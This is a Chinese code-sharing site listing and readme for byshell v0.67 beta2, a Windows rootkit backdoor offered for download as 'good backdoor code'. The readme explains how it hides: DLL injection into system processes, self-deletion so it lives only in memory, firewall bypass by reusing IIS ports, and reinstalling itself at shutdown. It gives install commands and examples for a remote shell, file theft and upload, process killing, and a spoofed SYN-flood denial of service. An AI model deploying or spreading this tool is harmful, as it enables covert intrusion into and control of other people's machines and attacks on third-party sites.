easyshell
所属分类:系统编程
开发工具:Visual C++
文件大小:265KB
下载次数:227
上传日期:2007-04-16 03:55:07
上 传 者:
lidaye2007
说明: 不错的后门代码,用了一些驱动技术来隐藏进程,隐藏注册表,希望对大家有所帮助
(good backdoor code, used some technology-driven process to conceal, hide the registry, and I hope to help everyone)
文件列表:
067beta2\067cli\067cli.cpp (12563, 2005-06-04)
067beta2\067cli\067cli.dsp (3401, 2005-03-03)
067beta2\067cli\067cli.dsw (535, 2005-03-03)
067beta2\067cli\067cli.ncb (41984, 2005-06-04)
067beta2\067cli\067cli.opt (48640, 2005-06-04)
067beta2\067cli\067cli.plg (1115, 2005-06-04)
067beta2\067cli\Release (0, 2007-03-23)
067beta2\067cli (0, 2007-03-23)
067beta2\067iis6cli\067iis6cli.cpp (10430, 2005-06-07)
067beta2\067iis6cli\067iis6cli.dsp (3453, 2005-06-01)
067beta2\067iis6cli\067iis6cli.dsw (543, 2005-05-25)
067beta2\067iis6cli\067iis6cli.ncb (41984, 2005-06-07)
067beta2\067iis6cli\067iis6cli.opt (48640, 2005-06-07)
067beta2\067iis6cli\067iis6cli.plg (1322, 2005-06-07)
067beta2\067iis6cli\Release (0, 2007-03-23)
067beta2\067iis6cli (0, 2007-03-23)
067beta2\byloader\byloader.cpp (14321, 2005-06-04)
067beta2\byloader\byloader.dsp (4306, 2005-06-01)
067beta2\byloader\byloader.dsw (539, 2004-11-27)
067beta2\byloader\byloader.ncb (50176, 2005-06-04)
067beta2\byloader\byloader.opt (48640, 2005-06-04)
067beta2\byloader\byloader.plg (1288, 2005-06-04)
067beta2\byloader\Release (0, 2007-03-23)
067beta2\byloader (0, 2007-03-23)
067beta2\ntboot\2003manstr.cpp (2285, 2005-06-02)
067beta2\ntboot\ADE32.CPP (3015, 2005-02-19)
067beta2\ntboot\ADE32.HPP (1797, 2002-02-22)
067beta2\ntboot\ADE32TBL.CPP (10490, 2002-02-22)
067beta2\ntboot\ntboot.cpp (61029, 2005-06-07)
067beta2\ntboot\ntboot.dsp (4138, 2005-05-31)
067beta2\ntboot\ntboot.dsw (535, 2005-02-23)
067beta2\ntboot\ntboot.ncb (230400, 2007-03-11)
067beta2\ntboot\ntboot.opt (53760, 2007-03-11)
067beta2\ntboot\ntboot.plg (2375, 2005-06-07)
067beta2\ntboot\ntboot_old.cpp (50881, 2005-04-08)
067beta2\ntboot\Release (0, 2007-03-23)
067beta2\ntboot (0, 2007-03-23)
067beta2 (0, 2007-03-23)
byshell v0.67 beta2
June 4th,2005 author:"by"
byshell v0.67 beta2,是一个测试中的ring3 NT rootkit。
一、网络:实现在2000/XP下重复使用任意原有ring3进程打开的防火墙允许的网络端口,尤其是IIS等网络服务程序打开的网络端口,(如80,21,135。像139一类的内核开的端口除外。),从而可以使您穿过各种软件和硬件防火墙,边界路由器乃至NIDS。在2003下,不能够用普通的方法使用IIS6打开的端口,由于微软将它们移入了内核。请您使用作者提供的IIS6专用客户端。并且在IIS6上实现的后门传输较慢,请不要在这个专用shell上传文件,也不要提供大于100字节的输入。
二、自身隐蔽:该程序利用线程注射DLL到系统进程,解除DLL映射,并删除自身DLL和EXE文件,删除自身创建的服务,仅仅存在于内存中。于是在寄主机器上无法找到任何新增服务项,磁盘文件或者是进程空间里的不明DLL。关机时,该程序会截获关机的调用,在系统关闭之前恢复自己。但是请注意,如果对方不正常关机,会使后门消失。
三、使用方法:第一次使用时,在服务端把ntboot.exe和ntboot.dll放在同一目录下,执行ntboot.exe -install,安装完成后请删除安装文件。或者等效的,执行作者提供的setup.bat。普通的067cli是一般客户端,而067iis6cli是连接IIS6的专用客户端。注意,朋友们不要随便给那个DLL加壳,如果你改变了DLL的imagesize的大小,就必须重新编译ntboot.exe。清除方法:重新引导到安全模式,执行ntboot -remove就可以了。v0.67 beta2不再像beta1那样可以通过杀死spoolsv.exe重启清除。
四、配置该程序:如果你想改变一些设置,比如密码,连接暗号,DLL的imagesize大小(如果您给DLL加壳等等),XOR密钥等,请重新编译代码或者跟作者联系。因为该程序的特殊性,不方便使用配置文件;请大家见谅。源代码会在正式版发布后不久公开。
五、程序命令说明:
符号#是这个软件的命令提示符。目前支持的命令:
cmd 在此后跟你要执行的cmd命令,注意:只能执行一条单独的命令。直到命令执行完毕才返回控制。
eg. #cmddir c:\winnt
shell 输入此命令后,进入交互的远程cmd,直到键入endshell返回#提示符。
注意执行此命令后到你输入endshell之前,存在一个cmd.exe进程。
endshell 从shell状态返回#提示符。
byver 查看连接的服务端的版本。
sysinfo 取得对方的一些系统信息。
pslist 对方进程列表。有些BUG,没有对齐。
pskill 杀死对方指定进程。在此后跟你要杀死的进程的PID(由pslist得到)。
eg. #pskill972
modlist 对方指定进程加载的所有DLL的列表。在此后跟你要查看的进程的PID(由pslist得到)。
eg. #modlist972
reboot 重启对方机器。
/////以下的命令不可用于IIS6的后门,只可以用于普通情况:
get 在此软件的连接上下载远程文件。怕麻烦所以暂时不支持有空格的文件名:>。命令格式:
get 本地保存文件名 远程下载文件名
eg. #get c:\download\file.txt d:\sourcefile.txt
put 在此软件的连接上向远程上传文件。怕麻烦所以暂时不支持有空格的文件名:>。命令格式:
put 远程保存文件名 本地上传文件名
eg. #put d:\receive\file.txt c:\sourcefile.txt
SYN
警告:以下的SYN功能有一定的危险性,仅仅用做测试。如果用户非法使用此功能攻击合法站点,将自己承担全部法律后果。
注意:该功能不支持windows XP sp2。
SYN 使用服务端发起SYN洪水的拒绝服务攻击测试。
参数:SYN 测试对象IP 测试的分钟数 IP伪造类型(可选参数,0是完全伪造,1是C段伪造,2是不伪造,默认为0)每发多少个包休息一次(默认为100个,太多了会使被控制的机器CPU使用100%) 攻击对象端口(可选参数,默认为80WWW端口) 使用的端口(可选参数,0是随机变化,默认为0)
如果选择了某个可选参数,那么在它左边的可选参数就必须被选择,在它右边的可选参数则可以忽略。
eg. #SYN 172.18.1.5 15
eg. #SYN 172.18.1.5 15 1
eg. #SYN 172.18.1.5 15 0 1000
eg. #SYN 172.18.1.5 15 1 200 445 12345
queryDOS 查询服务端SYN攻击测试的详细情况。
endDOS 强制结束服务端的SYN作业。
五、参考资料:
[1]Hacker Defender
Holy_Father(holy_father_AT_phreaker.net)
http://rootkit.host.sk/
[2]cmdbind2
nongmin(nongmin.cn@yeah.net)
http://nongmin-cn.8u8.com
[3]ADE32
Z0mbie
http://z0mbie.host.sk/
六、感谢:
感谢CVC(www.retcvc.com)和xfocus(www.xfocus.net)的所有朋友的无私帮助。尤其是衷心的谢谢CVC的vxk老兄。祝所有朋友事业有成,家庭幸福。
七、作者简介:
白远方,男,上海华东师范大学2004级学生。喜欢研究系统底层和内核,喜欢交朋友,喜欢看PLMM。
我的联系方式:E-mail:baiyuanfan@163.com。
欢迎朋友们与我联系。
近期下载者:
相关文件:
收藏者: